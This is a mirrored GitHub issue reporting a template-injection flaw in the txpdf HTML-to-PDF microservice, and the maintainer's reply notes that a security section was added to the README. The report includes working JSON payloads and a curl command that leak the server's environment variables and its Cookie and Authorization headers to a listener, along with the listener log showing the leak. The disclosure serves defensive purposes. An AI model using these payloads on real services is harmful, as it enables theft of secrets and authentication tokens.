Giters

txn2 / txpdf

HTML to PDF microservice

Home Page:https://mk.imti.co/webpage-to-pdf-microservice/

Geek Repo:Geek Repo

Github PK Tool:Github PK Tool

Data exfil due to user controlled template

jessesomerville opened this issue · comments

commented

The /getPdf endpoint takes the body of the post request and uses it as a text/template with the functions provided by sprig.TxtFuncMap(). This allows for the exfil of the server's environment variables and potentially auth tokens included in the request by middleware.

input.json:

{
  "options": {
    "print_media_type": true
  },
  "pages": [
    {
      "Location": "http://localhost:8000?{{env .UserAgent}}"
    }
  ]
}
curl -d '@input.json' -X POST http://localhost:8080/getPdf -A "PWD" --output test.pdf

Log from python -m http.server

Serving HTTP on 0.0.0.0 port 8000 (http://0.0.0.0:8000/) ...
127.0.0.1 - - [04/Mar/2023 17:15:05] "GET /?/home/jsomerville/go/src/github.com/txn2/txpdf HTTP/1.1" 200 -

Or if this is running as a microservice you could steal the request headers that may have been added for S2S auth:

{
  "options": {
    "print_media_type": true
  },
  "pages": [
    {
      "Location": "http://localhost:8000?{{.Header.Get `Cookie`}};;{{.Header.Get `Authorization`}}"
    }
  ]
}
commented

added security section to README